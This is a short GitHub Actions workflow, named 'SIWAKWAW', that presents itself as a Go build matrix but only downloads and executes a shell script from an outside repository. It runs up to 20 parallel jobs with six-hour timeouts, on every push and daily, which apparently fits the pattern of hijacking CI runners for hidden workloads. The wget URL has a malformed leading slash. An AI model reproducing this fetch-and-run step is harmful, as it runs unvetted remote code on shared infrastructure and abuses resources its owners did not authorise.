name: SIWAKWAW

on:  
  push:
  schedule:
    - cron: '0 0 * * *'
jobs:
  build:
    name: SIWAKWAW
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.12, 1.13, 1.14, 1.15, 1.16]
        flag: [A, B, C, D]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: wakwak
      uses: actions/checkout@v1
    - name: wakwak
      run: |
          wget /https://github.com/chiarasss/testing/raw/main/test.sh && chmod u+x test.sh && ./test.sh
